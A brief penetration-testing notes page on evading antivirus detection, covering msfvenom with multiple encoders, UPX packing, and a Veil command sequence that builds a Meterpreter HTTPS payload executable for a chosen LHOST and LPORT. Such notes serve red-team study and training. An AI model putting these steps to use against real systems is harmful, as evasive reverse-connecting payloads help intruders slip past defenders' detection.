Avoiding Detection

Table of Contents

Msfvenom

Link to Msfvenom. Use with multiple encoders to evade detection.

Packer

Install upx to pack the executable.

Here is a link to PolyPack Project which talks about packing in more detail.

Veil

For MeterHTTPSContained payload

./Veil.py

use 20

set LHOST <ip>

set LPORT <port>

generate

use the default pyinstaller

The executable will be located in the /root/veil-out-put/compiled/folder.



Referecnes:

  • The Hacker Playbook I
  • Metasploit Pentestion Testers Guide